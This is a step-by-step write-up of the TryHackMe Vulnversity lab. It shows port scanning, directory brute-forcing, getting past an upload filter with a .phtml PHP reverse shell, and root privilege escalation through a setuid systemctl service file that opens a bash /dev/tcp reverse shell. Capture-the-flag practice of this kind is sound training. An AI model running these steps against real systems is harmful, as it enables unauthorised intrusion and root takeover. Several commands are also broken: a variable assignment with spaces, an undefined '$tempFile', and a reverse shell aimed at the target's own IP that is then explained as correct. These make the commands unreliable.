tryhackme Vulnversity Writeup

March 4, 2023, 5:51 a.m.

tryhackme Vulnversity writeup

connect to the tryhackme servers using their vpn sudo apt install openvpn

download the vpn config file https://tryhackme.com/access

sudo openvpn [config file]

once connected ping your target machine which you spun up in Task 1. In my case it is 10.10.1.153

ping 10.10.1.153

Reconnaissance:
scan all ports on the target

nmap -p- 10.10.1.153

you see that there are 6 ports open

now run a version scan on that squid port

nmap -sV -p 3128 10.10.1.153

you see it is version Squid http proxy 3.5.12

nmap -p-400 10.10.1.153

400 ports are scanned

nmap -n nmap 10.10.1.153

-n does not resolve dns

nmap -A 10.10.1.153

the host is running Ubuntu

from before you know that the web server is Apache on port 3333

Directory Bruteforcing
https://github.com/OJ/gobuster
you will need the GoBuster tool to automate the directory enumeration/discovery process

sudo apt-get install gobuster

navigate to the installed wordlists folder

cd /usr/share/wordlists
ls
cd /dirbuster/

now you will use the small directory wordlist to enumerate through

you are targetting port 3333 for the apache webserver which may host exposed directories

gobuster dir -u http://10.10.1.153:3333 -w directory-list-2.3-small.txt

this may take a while because there are 87,665 words

eventually the tool will print out that the directory /internal was discovered

go to firefox and navigate to that directory: http://10.10.1.153:3333/internal/

you have found the upload form

you can stop the gobuster tool whenever you'd like

Compromising the webserver
try to upload a bunch of different files to the form and discover that .php is being explicity blocked

now you will fuzz the form(meaning you will upload a bunch of random data to try and discover some error or entry way

open a new terminal

burpsuite

open firefox and install foxyproxy -- configure it to redirect requests to the burp proxy

create a file on your desktop folder

touch shell.php

with the burp intercept on, try to upload that file

forward the requests until you see a POST request with a filename header value

right click anyway on the request and send it to Intruder

in the position lines, find 'filename="§shell.php§"' and change it to "shell§.php§"

This makes the file extension a variable that burp will manipulate with each new request based off what you then put into the payload

in this case, go to the payload tab and add a bunch of different extensions:

.php .php2 .php3 .php4 .phtml

scroll down to "payload encoding" and uncheck URL-encode these characters.

start attack

by viewing the responses for each different extension request, you find that .phtml had a successful submission instead of the usual "extension not allowed"

you can turn the proxy off and close burpsuite

now that you know you can upload .phtml files, you want to payload a php reverse shell script and send it to be stored on the webserver where you will then cause the webserver to execute it

git clone https://github.com/pentestmonkey/php-reverse-shell.git

cd php-reverse-shell

mv php-reverse-shell.php shell.phtml

sudo nano shell.phtml

scroll down the code using arrow keys and change "$ip" to your vpn host IP and "$port" to 3333

press "ctl o" to write out and hit enter to save file

press "ctl x" to exit nano and return to terminal

upload the shell.phtml file to the webserver and navigate to http://IP:3333/internal/uploads/

you will see the index of the directory and your shell.phtml will be listed as a child

open a new termainl to start netcat

nc -lvnp 3333

this will make your host machine listen for connections on port 3333

now go back to the uploads index and click on your shell.phtml, this will cause the webserver to open and therefore execute the php code which in turn causes an outbound connection to be made to your host machine over port 3333

look at the terminal that you started netcat in and you will see the connection was established and now you have a reverse shell open. Congrats.

whoami
ls
cat /etc/passwd

you see a list of users and one name pops out: bill

cd /home/bill
ls
cat user.txt

there is the user flag

Privilege Escalation
this finds files with setuid permission

find / -user root -perm -4000 -exec ls -ldb {} \;

"find /" checks all mounted paths starting at / which is the root directory

"-user root" displays all files owned by root

"-perm -4000" displays files with permissions set to 4000

"-exec ls -ldb" displays the out of the find command in ls -ldb format

you will notice that most of the files cannot be checked because you do not have the right permissions

one file does pop out, however, and that is /bin/systemctl which has the setuid permission

Now it is time to make a temporary service file and then enable it with /bin/systemctl

Because /bin/systemctl has setuid permissions, it will grant root privileges to the service

That service will then be able to access the root.txt file that is hidden in on the machine

keep in mind that we would have no idea that the root.txt file is there and it would take a more complex service to find it, however, to keep this simple, we already know about it

reference https://gtfobins.github.io/gtfobins/systemctl/

cd /tmp
ls

$(mktemp) randomizes the name

TF = $(mktemp).service

then we echo in txt into the file

the quotation means the start of what to write into file

this means you can press enter to go to the next line

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]
WantedBy=multi-user.target' > $TF

the temp service file will is now ready

/bin/systemctl link $tempFile
/bin/systemctl enable --now $TF
ls

the root.txt file should now be in the /tmp directory

cat root.txt

and you have found the root flag

Here is the more complex answer where we run a reverse shell with root access

You will also simply make a service file without randomizing the name

cd /tmp
touch a.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.1.153/7777 0>&1"
[Install]
WantedBy=multi-user.target' > /tmp/a.service
/bin/systemctl link /tmp/a.service

open a new termainl for a netcat listener

nc -lvnp 7777

finally start the service

/bin/systemctl enable --now /tmp/a.service

in the nc terminal you will see that a connection was established and you are now root@vulniversity

cd /root/
ls
cat root.txt

you have now found the root flag

Further notes:

I want to breakdown the service file and its creation a little to explain it better

"touch a.service" created an empty file with the .service extension

"echo '" begins an echo command with the intitial quotation mark. That means everything after will be contained until the closing quotation mark appears. This means you can press enter to go to a new line without breaking the command.

"[Service]" at the top makes it so the file is recognized as a service

"Type=oneshot" means that it will only run once

"ExecStart=/bin/bash" is the main process of the service and in this case you are running bash. "-c" is the command option and "bash -i >& /dev/tcp/10.10.1.153/7777 0>&1" is the command. This is telling the machine to open a reverse shell with 10.10.1.153 over port 7777.

"[Install] is necessary

"WantedBy=multi-user.target'" is so that the service is used by all users instead of just specifying one. The closing quotation mark there ends the echo command. " > /tmp/a.service" is how you pipe(or paste text) of the echo command to a file -- in this case the service file. This is the command-line way of writing to a file because there may not be a file editor installed on the target machine or you may not have permissions to use one.

Finally, you create a symbolic link between /bin/systemctl and /tmp/a.service so that systemctl can control(start, stop, restart) the service with root permission.